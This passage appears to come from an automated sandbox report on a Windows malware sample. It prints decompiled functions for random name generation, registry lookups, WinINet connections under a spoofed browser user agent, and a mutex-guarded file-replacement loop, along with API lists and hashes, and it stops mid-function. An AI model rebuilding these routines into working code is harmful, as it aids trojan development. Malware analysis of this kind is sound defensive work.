            0x00414806
            0x0041480d
            0x00414829
            0x00414813
            0x00414813
            0x00414816
            0x0041481a
            0x00414820
            0x00414822
            0x00414825
            0x00000000
            0x00000000
            0x00414827
            0x00000000
            0x00414825
            0x0041481a
            0x0041482c
            0x0041482c
            0x00414832
            0x00414836
            0x0041483c
            0x00414842
            0x00414842
            0x00414849

            APIs
              • Part of subcall function 00411812: GetTickCount.KERNEL32 ref: 00411812
            • CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0041483C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CharCountTickUpper
            • String ID: .exe$aeiouy$bcdfghklmnpqrstvwxz$3@
            • API String ID: 2674899715-2705927624
            • Opcode ID: 6cae42146436ed9b1862f147593c66c1629bff61a5de4005452ac910b6e288e9
            • Instruction ID: ad0e179f644eefb186cb14b873178787c0144a13075521483b84674fb271e9e1
            • Opcode Fuzzy Hash: 6cae42146436ed9b1862f147593c66c1629bff61a5de4005452ac910b6e288e9
            • Instruction Fuzzy Hash: 1441A075D002599BCB10EF95C0852FEBBB4FF84305F20806BD961AB280D7799A81CB99
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040F504 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
            Download Yara Rule
            C-Code - Quality: 71%
            			E0040F504(void* _a4, WCHAR* _a8) {
				char _v5;
				char _v44;
				char _v164;
				char _v684;
				void* __ebx;
				void* __edi;
				void* __esi;
				void** _t14;
				void* _t19;
				void* _t26;
				long _t29;
				void* _t36;
				WCHAR* _t40;

				_t14 =  &_a4;
				_push(_t14);
				_push(_a4);
				_v5 = 0;
				L00416BA4();
				if(_t14 != 0) {
					_t43 =  &_v164;
					E0040F369(0xa5,  &_v164);
					_push(_a4);
					_t40 =  &_v684;
					_t19 = E004111A5( &_v164, 0x104, _t40, _t43);
					_pop(_t36);
					if(_t19 > 0) {
						E0040F369(0xa6,  &_v44);
						_t26 = E004143B6(0x80000002, 0x104, _t36, _t40, _t40,  &_v44);
						if(_t26 != 0 && _t26 != 0xffffffff) {
							PathUnquoteSpacesW(_t40);
							_t29 = ExpandEnvironmentStringsW(_t40, _a8, 0x104);
							asm("sbb al, al");
							_v5 = _t29 - 1 + 1;
						}
					}
					LocalFree(_a4);
				}
				return _v5;
			}
















            0x0040f50d
            0x0040f510
            0x0040f511
            0x0040f514
            0x0040f518
            0x0040f51f
            0x0040f528
            0x0040f533
            0x0040f538
            0x0040f545
            0x0040f54b
            0x0040f551
            0x0040f554
            0x0040f55c
            0x0040f56c
            0x0040f573
            0x0040f57d
            0x0040f58a
            0x0040f596
            0x0040f59a
            0x0040f59a
            0x0040f573
            0x0040f5a0
            0x0040f5a8
            0x0040f5ad

            APIs
            • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 0040F518
            • LocalFree.KERNEL32(?,.exe,00000000,00000000), ref: 0040F5A0
              • Part of subcall function 004143B6: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,?,0040F571,?,00000017,.exe,00000000,00000000), ref: 004143C9
            • PathUnquoteSpacesW.SHLWAPI(?,?,00000017,.exe,00000000,00000000), ref: 0040F57D
            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 0040F58A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: ConvertEnvironmentExpandFreeLocalOpenPathSpacesStringStringsUnquote
            • String ID: .exe
            • API String ID: 2200435814-4119554291
            • Opcode ID: 3d3a5ffcd089b925b0521f9b2b386f08974a583d4f03015875c519858c0bc982
            • Instruction ID: b09d30a59428e7d94231bb48e8c656f9be3abaabfb92e1b6a89a881d97c16066
            • Opcode Fuzzy Hash: 3d3a5ffcd089b925b0521f9b2b386f08974a583d4f03015875c519858c0bc982
            • Instruction Fuzzy Hash: 1511A3357041187FDF20AB79DC48ADE7BACEF45364F004176B848E26A2CB38D94AC765
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00411E55 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46networkCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00411E55(signed int __eax, char* __ecx) {
				short _v28;
				char* _v32;
				signed int _t5;
				void* _t12;
				void* _t14;
				char* _t15;
				void* _t18;

				_t15 = __ecx;
				_t5 = __eax;
				if(__ecx == 0) {
					_t15 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)";
				}
				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
				if(_t14 == 0) {
					L7:
					return 0;
				}
				_t18 = 0;
				do {
					_t1 = _t18 + 0x41a00c; // 0x41a00c
					_t2 = _t18 + 0x41a008; // 0x2
					InternetSetOptionA(_t14,  *_t2, _t1, 4);
					_t18 = _t18 + 8;
				} while (_t18 < 0x18);
				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
				if(_t12 == 0) {
					InternetCloseHandle(_t14);
					goto L7;
				}
				return _t12;
			}










            0x00411e55
            0x00411e55
            0x00411e5b
            0x00411e5d
            0x00411e5d
            0x00411e72
            0x00411e76
            0x00411eba
            0x00000000
            0x00411eba
            0x00411e79
            0x00411e7b
            0x00411e7d
            0x00411e84
            0x00411e8b
            0x00411e91
            0x00411e94
            0x00411ea8
            0x00411eb1
            0x00411eb4
            0x00000000
            0x00411eb4
            0x00411ebe

            APIs
            • InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 00411E6C
            • InternetSetOptionA.WININET(00000000,00000002,0041A00C,00000004), ref: 00411E8B
            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00411EA8
            • InternetCloseHandle.WININET(00000000), ref: 00411EB4
            Strings
            • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 00411E5D, 00411E6B
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Internet$CloseConnectHandleOpenOption
            • String ID: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
            • API String ID: 910987326-3737944857
            • Opcode ID: 34711a5b39f0aadf863cbd871282b2d53fd9348694ca647a57004c5ba28257dd
            • Instruction ID: 7ae4eff06b244a024871c8cfa537538ebb1f25328139bafa5aa076e5744cb1fb
            • Opcode Fuzzy Hash: 34711a5b39f0aadf863cbd871282b2d53fd9348694ca647a57004c5ba28257dd
            • Instruction Fuzzy Hash: D5F096721003007BE7215BA15C8CDAB7E6DEBCDB65B04052DFE56E1031D1358890877C
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004122CD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
            Download Yara Rule
            C-Code - Quality: 54%
            			E004122CD() {
				char _v8;
				struct HINSTANCE__* _v12;
				void* _v1036;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t15;
				char _t22;
				void* _t28;

				_t22 = 0;
				_t13 = LoadLibraryA("urlmon.dll");
				_v12 = _t13;
				if(_t13 != 0) {
					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
					if(_t15 != 0) {
						_push( &_v8);
						_push( &_v1036);
						_push(0);
						_v8 = 0x3ff;
						_v1036 = 0;
						if( *_t15() == 0) {
							if(_v8 > 0x3ff) {
								_v8 = 0x3ff;
							}
							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
							_t22 = E00410882( &_v1036 | 0xffffffff,  &_v1036);
						}
					}
					FreeLibrary(_v12);
				}
				return _t22;
			}










            0x004122dc
            0x004122de
            0x004122e4
            0x004122e9
            0x004122f1
            0x004122f9
            0x004122ff
            0x00412306
            0x0041230c
            0x0041230d
            0x00412310
            0x0041231a
            0x0041231f
            0x00412321
            0x00412321
            0x00412327
            0x0041233d
            0x0041233d
            0x0041233f
            0x00412343
            0x00412343
            0x0041234d

            APIs
            • LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 004122DE
            • GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 004122F1
            • FreeLibrary.KERNEL32(?), ref: 00412343
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Library$AddressFreeLoadProc
            • String ID: ObtainUserAgentString$urlmon.dll
            • API String ID: 145871493-2685262326
            • Opcode ID: 4b3f1af66c4ce0bcd88c8d74e9aeb89e72bfbe725b22fa6431f3d332f105cdf5
            • Instruction ID: e84c6d918167b2fc21815cd409f04a98974ffb3c171ad824036f5af67a46dcfa
            • Opcode Fuzzy Hash: 4b3f1af66c4ce0bcd88c8d74e9aeb89e72bfbe725b22fa6431f3d332f105cdf5
            • Instruction Fuzzy Hash: C001AC71900259AFCB109FF49E845DE7BBCAB08300F2000BBF655F3250DA788F848B68
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00409C06 Relevance: 7.7, APIs: 5, Instructions: 218COMMON
            Download Yara Rule
            C-Code - Quality: 78%
            			E00409C06(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v60;
				char _v72;
				char _v84;
				char _v104;
				char _v112;
				char _v152;
				char _v672;
				void* __edi;
				void* __esi;
				signed int _t75;
				intOrPtr* _t78;
				signed int _t79;
				intOrPtr* _t80;
				void* _t82;
				signed int _t85;
				void* _t87;
				intOrPtr* _t89;
				signed int _t90;
				void* _t91;
				intOrPtr* _t93;
				signed int _t94;
				void* _t95;
				intOrPtr* _t97;
				signed int _t98;
				void* _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed int _t108;
				void* _t110;
				signed int _t114;
				signed int _t116;
				signed int _t124;
				signed int _t126;
				void* _t151;
				signed int _t154;
				intOrPtr* _t157;
				char* _t158;
				char* _t159;
				char* _t160;
				char* _t161;
				intOrPtr _t163;

				if(E00415D45( &(__edx[0x2c]),  &_v672, __ecx) == 0) {
					L49:
					return 1;
				}
				_t172 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t124 = E0041699E( &_v672, __eflags,  &_v672);
					_v28 = _t124;
					__eflags = _t124;
					if(_t124 == 0) {
						L48:
						goto L49;
					}
					_t75 =  *((intOrPtr*)( *_t124 + 0xb4))(_t124,  &_v8);
					__eflags = _t75;
					if(_t75 != 0) {
						L47:
						 *((intOrPtr*)( *_t124 + 8))(_t124);
						goto L48;
					}
					_t78 = _v8;
					_t79 =  *((intOrPtr*)( *_t78 + 0x1c))(_t78,  &_v32);
					__eflags = _t79;
					if(_t79 != 0) {
						L46:
						_t80 = _v8;
						 *((intOrPtr*)( *_t80 + 8))(_t80);
						goto L47;
					}
					_t82 = 0x75;
					E0040F369(_t82,  &_v112);
					_t151 = 0xc;
					_t85 = E00411145( &_v112, _v32, _t151);
					__eflags = _t85;
					if(_t85 != 0) {
						_t157 = __imp__#6;
						L45:
						 *_t157(_v32);
						goto L46;
					}
					_t158 =  &_v72;
					_t87 = 0x76;
					E0040F369(_t87, _t158);
					_t89 = _v8;
					_t133 =  *_t89;
					_t90 =  *((intOrPtr*)( *_t89 + 0x94))(_t89, _t158,  &_v44);
					__eflags = _t90;
					if(_t90 != 0) {
						_t22 =  &_v20;
						 *_t22 = _v20 & 0x00000000;
						__eflags =  *_t22;
					} else {
						_v20 = E00416A20(_t133,  &_v44);
					}
					_t159 =  &_v60;
					_t91 = 0x77;
					E0040F369(_t91, _t159);
					_t93 = _v8;
					_t134 =  *_t93;
					_t94 =  *((intOrPtr*)( *_t93 + 0x94))(_t93, _t159,  &_v36);
					__eflags = _t94;
					if(_t94 != 0) {
						_t30 =  &_v16;
						 *_t30 = _v16 & 0x00000000;
						__eflags =  *_t30;
					} else {
						_v16 = E00416A20(_t134,  &_v36);
					}
					_t160 =  &_v84;
					_t95 = 0x78;
					E0040F369(_t95, _t160);
					_t97 = _v8;
					_t135 =  *_t97;
					_t98 =  *((intOrPtr*)( *_t97 + 0x94))(_t97, _t160,  &_v40);
					__eflags = _t98;
					if(_t98 != 0) {
						_t126 = 0;
						__eflags = 0;
					} else {
						_t126 = E00416A20(_t135,  &_v40);
					}
					_t161 =  &_v104;
					_t99 = 0x79;
					E0040F369(_t99, _t161);
					_t101 = _v8;
					_t136 =  *_t101;
					_t148 = _t161;
					_t102 =  *((intOrPtr*)( *_t101 + 0x94))(_t101, _t161,  &_v48);
					__eflags = _t102;
					if(_t102 != 0) {
						_t43 =  &_v12;
						 *_t43 = _v12 & 0x00000000;
						__eflags =  *_t43;
					} else {
						_v12 = E00416A20(_t136,  &_v48);
					}
					_t103 = _v20;
					__eflags = _t103;
					if(_t103 == 0) {
						_t157 = __imp__#6;
						goto L37;
					} else {
						__eflags =  *_t103;
						if( *_t103 == 0) {
							L35:
							_t157 = __imp__#6;
							 *_t157(_v20);
							L37:
							__eflags = _v16;
							if(_v16 != 0) {
								 *_t157(_v16);
							}
							__eflags = _t126;
							if(_t126 != 0) {
								 *_t157(_t126);
							}
							__eflags = _v12;
							if(_v12 != 0) {
								 *_t157(_v12);
							}
							_t124 = _v28;
							goto L45;
						}
						__eflags = _t126;
						if(_t126 == 0) {
							goto L35;
						}
						__eflags =  *_t126;
						if( *_t126 == 0) {
							goto L35;
						}
						_t153 = _v12;
						__eflags = _v12;
						if(_v12 == 0) {
							goto L35;
						}
						_t108 = E0040970A(_t148, _t153);
						__eflags = _t108;
						if(_t108 <= 0) {
							goto L35;
						}
						_t109 = _v16;
						__eflags = _v16;
						if(_v16 == 0) {
							_t154 = 0;
							__eflags = 0;
						} else {
							_t154 = E00410B54(_t109);
						}
						__eflags = _t154 - 1;
						if(_t154 < 1) {
							L30:
							_t154 = 0x15;
							goto L31;
						} else {
							__eflags = _t154 - 0xffff;
							if(_t154 <= 0xffff) {
								L31:
								_v24 = _v24 & 0x00000000;
								_t110 = 0x2c;
								E0040F369(_t110,  &_v152);
								_push(_t154);
								_push(_v20);
								_push(_v12);
								_t114 = E00411220( &_v24,  &_v152, _t126);
								__eflags = _t114;
								if(_t114 > 0) {
									_t163 = _a4;
									_t116 = E00410818(_t114, _t163, _v24);
									__eflags = _t116;
									if(_t116 != 0) {
										_t56 = _t163 + 4;
										 *_t56 =  *(_t163 + 4) + 1;
										__eflags =  *_t56;
									}
								}
								E00410418(_v24);
								goto L35;
							}
							goto L30;
						}
					}
				}
				E00409BC3( &_v672, _a4, _t172);
				goto L49;
			}
























































            0x00409c24
            0x00409e5f
            0x00409e63
            0x00409e63
            0x00409c2a
            0x00409c2d
            0x00409c4f
            0x00409c51
            0x00409c54
            0x00409c56
            0x00409e5e
            0x00000000
            0x00409e5e
            0x00409c63
            0x00409c69
            0x00409c6b
            0x00409e58
            0x00409e5b
            0x00000000
            0x00409e5b
            0x00409c71
            0x00409c7b
            0x00409c7e
            0x00409c80
            0x00409e4f
            0x00409e4f
            0x00409e55
            0x00000000
            0x00409e55
            0x00409c8c
            0x00409c8d
            0x00409c97
            0x00409c9a
            0x00409c9f
            0x00409ca1
            0x00409e43
            0x00409e49
            0x00409e4c
            0x00000000
            0x00409e4e
            0x00409ca9
            0x00409cac
            0x00409cad
            0x00409cb2
            0x00409cb5
            0x00409cbf
            0x00409cc5
            0x00409cc7
            0x00409cd6
            0x00409cd6
            0x00409cd6
            0x00409cc9
            0x00409cd1
            0x00409cd1
            0x00409cdc
            0x00409cdf
            0x00409ce0
            0x00409ce5
            0x00409ce8
            0x00409cf2
            0x00409cf8
            0x00409cfa
            0x00409d09
            0x00409d09
            0x00409d09
            0x00409cfc
            0x00409d04
            0x00409d04
            0x00409d0f
            0x00409d12
            0x00409d13
            0x00409d18
            0x00409d1b
            0x00409d25
            0x00409d2b
            0x00409d2d
            0x00409d3b
            0x00409d3b
            0x00409d2f
            0x00409d37
            0x00409d37
            0x00409d3f
            0x00409d42
            0x00409d43
            0x00409d48
            0x00409d4b
            0x00409d51
            0x00409d55
            0x00409d5b
            0x00409d5d
            0x00409d6c
            0x00409d6c
            0x00409d6c
            0x00409d5f
            0x00409d67
            0x00409d67
            0x00409d70
            0x00409d73
            0x00409d75
            0x00409e1b
            0x00000000
            0x00409d7b
            0x00409d7b
            0x00409d7f
            0x00409e0e
            0x00409e11
            0x00409e17
            0x00409e21
            0x00409e21
            0x00409e25
            0x00409e2a
            0x00409e2a
            0x00409e2c
            0x00409e2e
            0x00409e31
            0x00409e31
            0x00409e33
            0x00409e37
            0x00409e3c
            0x00409e3c
            0x00409e3e
            0x00000000
            0x00409e3e
            0x00409d85
            0x00409d87
            0x00000000
            0x00000000
            0x00409d8d
            0x00409d91
            0x00000000
            0x00000000
            0x00409d93
            0x00409d96
            0x00409d98
            0x00000000
            0x00000000
            0x00409d9a
            0x00409d9f
            0x00409da1
            0x00000000
            0x00000000
            0x00409da3
            0x00409da6
            0x00409da8
            0x00409db3
            0x00409db3
            0x00409daa
            0x00409daf
            0x00409daf
            0x00409db5
            0x00409db8
            0x00409dc2
            0x00409dc4
            0x00000000
            0x00409dba
            0x00409dba
            0x00409dc0
            0x00409dc5
            0x00409dc5
            0x00409dd1
            0x00409dd2
            0x00409dd7
            0x00409dd8
            0x00409ddd
            0x00409de6
            0x00409dee
            0x00409df0
            0x00409df2
            0x00409dfa
            0x00409dff
            0x00409e01
            0x00409e03
            0x00409e03
            0x00409e03
            0x00409e03
            0x00409e01
            0x00409e09
            0x00000000
            0x00409e09
            0x00000000
            0x00409dc0
            0x00409db8
            0x00409d75
            0x00409c38
            0x00000000

            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CombinePath
            • String ID:
            • API String ID: 3422762182-0
            • Opcode ID: 18a42e57422681588a1a7d9a7f7fa70672ddef84df9c4903b514d58febf243b6
            • Instruction ID: a4b5f7cb9a8cf618556ba2f56501364dc5f52b811903b9a6bd2a4601c8042949
            • Opcode Fuzzy Hash: 18a42e57422681588a1a7d9a7f7fa70672ddef84df9c4903b514d58febf243b6
            • Instruction Fuzzy Hash: FF716B31E00209ABDF10EBA1D844BEEB7B9AF84704F14847AE505B72D2D778AE45CB94
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040D2A3 Relevance: 7.7, APIs: 5, Instructions: 196stringCOMMON
            Download Yara Rule
            C-Code - Quality: 99%
            			E0040D2A3(WCHAR* __ecx, short _a4) {
				char _v268;
				signed int _v320;
				char _v609;
				signed short _v960;
				char _v1052;
				short _v1572;
				short _v1576;
				signed int _v1580;
				short _v1584;
				void* _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				char _v1600;
				intOrPtr _v1604;
				long _v1608;
				signed int _v1612;
				void* _v1613;
				signed int _v1616;
				void* __ebx;
				void* __esi;
				signed int _t54;
				void* _t55;
				signed int _t63;
				signed int _t65;
				signed int _t67;
				signed int _t74;
				signed int _t77;
				long _t78;
				long _t79;
				signed int _t83;
				void* _t86;
				signed int _t92;
				signed int _t99;
				signed int _t101;
				signed char _t115;
				signed int _t118;
				short _t122;
				void* _t125;
				WCHAR* _t128;

				_t119 = __ecx;
				_t122 = _a4;
				_t54 = E00403D00(__ecx,  *_t122, (0 |  *_t122 != 0x00000000) + 0x78d0c213, 2);
				_v1612 = _t54;
				if(_t54 != 0) {
					_t55 =  *0x41a758; // 0x0
					_v1588 = _t55;
					_v1584 =  &_v268;
					_v1596 = E0040D0FF;
					_v1592 = E0040D23B;
					_v1576 = _t122;
					E00403E4D( &_v1052);
					E00410454( &_v268,  &_v609, 0x102);
					_t63 =  *_t122 & 0x000000ff;
					__eflags = _t63;
					if(_t63 == 0) {
						_t65 = _v960 >> 0x10;
						__eflags = _t65;
						_v1608 = _t65;
						_v1612 = _v960 & 0x0000ffff;
						goto L7;
					} else {
						__eflags = _t63 != 1;
						if(_t63 != 1) {
							L7:
							_t67 = _v1608;
						} else {
							_t119 = _v320 & 0x0000ffff;
							_t67 = _v320 >> 0x10;
							_v1612 = _v320 & 0x0000ffff;
						}
					}
					_v1608 = _t67 * 0xea60;
					_v1612 = _v1612 * 0xea60;
					E004104CB( &_v1052,  &_v1052, 0, 0x310);
					_v1584 = 0;
					_t74 = E00403E39();
					__eflags = _t74;
					if(_t74 != 0) {
						do {
							__eflags =  *_t122;
							_v1613 = 1;
							if( *_t122 != 0) {
								L23:
								_t77 = E00405B98(_t119);
								_t127 = _t77;
								__eflags = _t77;
								if(__eflags == 0) {
									goto L32;
								} else {
									_v1612 = E00416037(0, _t120, __eflags, _t127, 0x4e23, 0x10000000);
									E00410418(_t127);
									__eflags = _v1616;
									if(_v1616 == 0) {
										L28:
										_t115 = _v1613;
									} else {
										_v1580 = _v1580 & 0;
										_t99 = E0040CEC4(_t119, _t120,  &_v1580, 1);
										__eflags = _t99;
										if(_t99 == 0) {
											goto L28;
										} else {
											 *(_t122 + 8) =  *(_t122 + 8) | 0xffffffff;
											_t101 = E0040D69A( &_v1600, _t119);
											__eflags = _t101;
											_t115 = (0 | _t101 != 0x00000000) - 0x00000001 & 0x00000002;
											E00416468(_t122 + 8);
											E00410418(_v1580);
										}
									}
									E00410418(_v1600);
									__eflags = _t115 - 2;
									if(_t115 != 2) {
										_t78 = _v1608;
										__eflags = _t115;
										if(_t115 != 0) {
											goto L32;
										}
									} else {
										_t78 = _v1612;
									}
								}
							} else {
								asm("sbb ebx, ebx");
								E0040CD7B( !( ~(_v1572 & 0x0000ffff)) &  &_v1572, _t119, 0);
								_t128 = _t122 + 0x122;
								_t83 = GetFileAttributesW( &_v1576);
								__eflags = _t83 - 0xffffffff;
								if(_t83 == 0xffffffff) {
									_t83 = GetFileAttributesW(0x41aa80);
									__eflags = _t83 - 0xffffffff;
									if(_t83 == 0xffffffff) {
										goto L32;
									} else {
										_t119 = 0x41aa80;
										goto L14;
									}
								} else {
									_t119 =  &_v1572;
									L14:
									_t120 = _t128;
									E004107C1(_t83 | 0xffffffff, _t119, _t120);
									_t86 = E00415896(_t120, _t128);
									__eflags = _t86 - 0xffffffff;
									if(_t86 != 0xffffffff) {
										L16:
										__eflags = _t120;
										if(__eflags > 0) {
											goto L27;
										} else {
											if(__eflags < 0) {
												L19:
												__eflags = lstrcmpiW(_t128,  &_v1572);
												if(__eflags == 0) {
													goto L23;
												} else {
													_t118 = E00403D00(_t119, __eflags, 0x8793aef0, 2);
													__eflags = _t118;
													if(_t118 == 0) {
														goto L32;
													} else {
														_t92 = MoveFileExW(_t128,  &_v1572, 0xb);
														__eflags = _t92;
														if(_t92 == 0) {
															goto L32;
														} else {
															E00413A4E(_t118);
															__eflags = _t92 | 0xffffffff;
															_t119 =  &_v1576;
															_t120 = _t128;
															E004107C1(_t92 | 0xffffffff,  &_v1576, _t128);
															goto L23;
														}
													}
												}
											} else {
												__eflags = _t86 - 0xffffffff;
												if(_t86 > 0xffffffff) {
													goto L27;
												} else {
													goto L19;
												}
											}
										}
									} else {
										__eflags = _t120;
										if(_t120 == 0) {
											L27:
											E004158D7(_t128);
											L32:
											_t78 = 0x7530;
										} else {
											goto L16;
										}
									}
								}
							}
							_t79 = WaitForSingleObject( *0x41a758, _t78);
							__eflags = _t79 - 0x102;
						} while (_t79 == 0x102);
					}
					E00413A4E(_v1604);
					_t125 = 0;
				} else {
					_t125 = 1;
				}
				E00410418(_t122);
				return _t125;
			}










































            0x0040d2a3
            0x0040d2b2
            0x0040d2c6
            0x0040d2cb
            0x0040d2d1
            0x0040d2e7
            0x0040d2ec
            0x0040d2f7
            0x0040d302
            0x0040d30a
            0x0040d312
            0x0040d316
            0x0040d330
            0x0040d338
            0x0040d338
            0x0040d33a
            0x0040d35e
            0x0040d35e
            0x0040d361
            0x0040d36d
            0x00000000
            0x0040d33c
            0x0040d33c
            0x0040d33d
            0x0040d371
            0x0040d371
            0x0040d33f
            0x0040d33f
            0x0040d34e
            0x0040d351
            0x0040d351
            0x0040d33d
            0x0040d37b
            0x0040d38e
            0x0040d39b
            0x0040d3a2
            0x0040d3a7
            0x0040d3ac
            0x0040d3ae
            0x0040d3b4
            0x0040d3b4
            0x0040d3b7
            0x0040d3bc
            0x0040d48d
            0x0040d48d
            0x0040d492
            0x0040d494
            0x0040d496
            0x00000000
            0x0040d49c
            0x0040d4af
            0x0040d4b3
            0x0040d4b8
            0x0040d4bc
            0x0040d503
            0x0040d503
            0x0040d4be
            0x0040d4be
            0x0040d4c9
            0x0040d4ce
            0x0040d4d0
            0x00000000
            0x0040d4d2
            0x0040d4d5
            0x0040d4dc
            0x0040d4e1
            0x0040d4e8
            0x0040d4eb
            0x0040d4f4
            0x0040d4f4
            0x0040d4d0
            0x0040d50b
            0x0040d510
            0x0040d513
            0x0040d51b
            0x0040d51f
            0x0040d521
            0x00000000
            0x00000000
            0x0040d515
            0x0040d515
            0x0040d515
            0x0040d513
            0x0040d3c2
            0x0040d3c9
            0x0040d3d5
            0x0040d3e5
            0x0040d3eb
            0x0040d3ed
            0x0040d3f0
            0x0040d3fd
            0x0040d3ff
            0x0040d402
            0x00000000
            0x0040d408
            0x0040d408
            0x00000000
            0x0040d408
            0x0040d3f2
            0x0040d3f2
            0x0040d40d
            0x0040d410
            0x0040d412
            0x0040d418
            0x0040d41d
            0x0040d420
            0x0040d42a
            0x0040d42a
            0x0040d42c
            0x00000000
            0x0040d432
            0x0040d432
            0x0040d43d
            0x0040d449
            0x0040d44b
            0x00000000
            0x0040d44d
            0x0040d459
            0x0040d45b
            0x0040d45d
            0x00000000
            0x0040d463
            0x0040d46b
            0x0040d471
            0x0040d473
            0x00000000
            0x0040d479
            0x0040d47a
            0x0040d47f
            0x0040d482
            0x0040d486
            0x0040d488
            0x00000000
            0x0040d488
            0x0040d473
            0x0040d45d
            0x0040d434
            0x0040d434
            0x0040d437
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0040d437
            0x0040d432
            0x0040d422
            0x0040d422
            0x0040d424
            0x0040d4fb
            0x0040d4fc
            0x0040d523
            0x0040d523
            0x00000000
            0x00000000
            0x00000000
            0x0040d424
            0x0040d420
            0x0040d3f0
            0x0040d52f
            0x0040d535
            0x0040d535
            0x0040d3b4
            0x0040d544
            0x0040d549
            0x0040d2d3
            0x0040d2d5
            0x0040d2d5
            0x0040d2d7
            0x0040d2e4

            APIs
              • Part of subcall function 00403D00: CreateMutexW.KERNEL32(0041A2C8,00000000,?,?,?,?,?), ref: 00403D21
            • GetFileAttributesW.KERNEL32(?,00000000,?,00000000,00000310,?,?,00000102), ref: 0040D3EB
            • lstrcmpiW.KERNEL32(?,?,?), ref: 0040D443
            • MoveFileExW.KERNEL32(?,?,0000000B,8793AEF0,00000002), ref: 0040D46B
              • Part of subcall function 00410418: HeapFree.KERNEL32(00000000,00000000,00411C0D,00000000,?,?,?,?,0040373A,00000000,00403AF4), ref: 0041042B
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: File$AttributesCreateFreeHeapMoveMutexlstrcmpi
            • String ID:
            • API String ID: 1600310851-0
            • Opcode ID: aa1a35374e280e0549fbe7f6ac3adfeff7045c7975040aab1e344b5d27d27473
            • Instruction ID: 141fdc3b59a9f30e1d611daaf600479c39b2320570823e61d4fdaf8e07618e79
            • Opcode Fuzzy Hash: aa1a35374e280e0549fbe7f6ac3adfeff7045c7975040aab1e344b5d27d27473
            • Instruction Fuzzy Hash: A46115719043416AD310EFA4CC81AAFBBD8EF45318F100A3FF994A61D1D778DA89879B
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00408F31 Relevance: 7.7, APIs: 5, Instructions: 193registrymemoryCOMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E00408F31(char* __ecx, void* __edx) {
				void* _v8;
				int _v12;
				signed int _v16;
				int _v20;
				void* _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v56;
